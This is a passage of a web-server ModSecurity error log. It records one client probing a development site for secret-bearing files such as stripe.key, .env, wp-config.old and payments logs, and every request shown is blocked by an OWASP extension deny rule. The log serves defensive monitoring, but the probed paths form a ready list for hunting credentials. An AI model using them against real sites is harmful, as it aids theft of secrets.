.dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.bak"] [unique_id "aai7smbPYJqr0YkBIXaI8wAAARI"] [Thu Mar 05 01:09:38.664964 2026] [:error] [pid 19294:tid 19324] [client 185.177.72.60:53274] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.old"] [unique_id "aai7smbPYJqr0YkBIXaI9AAAARM"] [Thu Mar 05 01:09:38.706974 2026] [:error] [pid 19294:tid 19304] [client 185.177.72.60:53274] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.backup"] [unique_id "aai7smbPYJqr0YkBIXaI9gAAAQA"] [Thu Mar 05 01:09:45.154481 2026] [:error] [pid 19294:tid 19305] [client 185.177.72.60:53180] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.inc"] [unique_id "aai7uWbPYJqr0YkBIXaJKgAAAQE"] [Thu Mar 05 01:09:46.723413 2026] [:error] [pid 32701:tid 32739] [client 185.177.72.60:53304] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aai7unV4HwIJ5qplG4av8QAAAIE"] [Thu Mar 05 01:09:46.729894 2026] [:error] [pid 366:tid 388] [client 185.177.72.60:53628] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aai7uiB_HMpi1kve4LNJmwAAANI"] [Thu Mar 05 01:09:46.791378 2026] [:error] [pid 32701:tid 32766] [client 185.177.72.60:53304] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aai7unV4HwIJ5qplG4av8gAAAI4"] [Thu Mar 05 01:09:46.836067 2026] [:error] [pid 366:tid 378] [client 185.177.72.60:53372] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "aai7uiB_HMpi1kve4LNJnAAAAMg"] [Thu Mar 05 01:09:46.894554 2026] [:error] [pid 32701:tid 311] [client 185.177.72.60:53454] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "aai7unV4HwIJ5qplG4av9AAAAJY"] [Thu Mar 05 01:10:49.318390 2026] [:error] [pid 19294:tid 19324] [client 185.177.72.60:28596] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aai7-WbPYJqr0YkBIXaJnQAAARM"] [Thu Mar 05 01:10:50.192289 2026] [access_compat:error] [pid 20344:tid 20387] [client 185.177.72.60:28774] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Mar 05 01:10:55.588830 2026] [:error] [pid 32700:tid 306] [client 185.177.72.60:28736] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.old"] [unique_id "aai7_zaJQkz94nR98Oac1wAAAFg"] [Thu Mar 05 01:10:55.771561 2026] [:error] [pid 32699:tid 32717] [client 185.177.72.60:28798] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aai7_4nqwP8nS3Nk9jeIdwAAAA4"] [Thu Mar 05 01:10:58.951839 2026] [:error] [pid 32700:tid 32731] [client 185.177.72.60:28736] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.key"] [unique_id "aai8AjaJQkz94nR98Oac6wAAAEE"] [Thu Mar 05 01:10:59.472494 2026] [:error] [pid 20344:tid 20394] [client 185.177.72.60:28672] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.log"] [unique_id "aai8A0ovC1LHu1hCWINsCgAAAU4"] [Thu Mar 05 01:10:59.506778 2026] [:error] [pid 20344:tid 20400] [client 185.177.72.60:28672] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.conf"] [unique_id "aai8A0ovC1LHu1hCWINsCwAAAVQ"] [Thu Mar 05 01:10:59.969814 2026] [:error] [pid 20530:tid 20547] [client 185.177.72.60:28720] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.ini"] [unique_id "aai8A-CKXVGwWSyj60LiFAAAAYw"] [Thu Mar 05 01:11:00.008932 2026] [:error] [pid 20530:tid 20539] [client 185.177.72.60:28720] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.bak"] [unique_id "aai8BOCKXVGwWSyj60LiFQAAAYQ"] [Thu Mar 05 01:11:00.191710 2026] [:error] [pid 20530:tid 20547] [client 185.177.72.60:28788] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.old"] [unique_id "aai8BOCKXVGwWSyj60LiFwAAAYw"] [Thu Mar 05 01:11:00.378171 2026] [:error] [pid 20344:tid 20382] [client 185.177.72.60:28672] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/stripe.backup"] [unique_id "aai8BEovC1LHu1hCWINsHQAAAUI"] [Thu Mar 05 01:11:06.647386 2026] [:error] [pid 20344:tid 20397] [client 185.177.72.60:25168] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.inc"] [unique_id "aai8CkovC1LHu1hCWINsWQAAAVE"] [Thu Mar 05 01:11:08.778934 2026] [:error] [pid 20344:tid 20399] [client 185.177.72.60:25298] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aai8DEovC1LHu1hCWINsbQAAAVM"] [Thu Mar 05 01:11:08.840469 2026] [:error] [pid 20344:tid 20384] [client 185.177.72.60:25298] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aai8DEovC1LHu1hCWINsbgAAAUQ"] [Thu Mar 05 01:11:08.866774 2026] [:error] [pid 20344:tid 20388] [client 185.177.72.60:25298] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aai8DEovC1LHu1hCWINsbwAAAUg"] [Thu Mar 05 01:11:08.914089 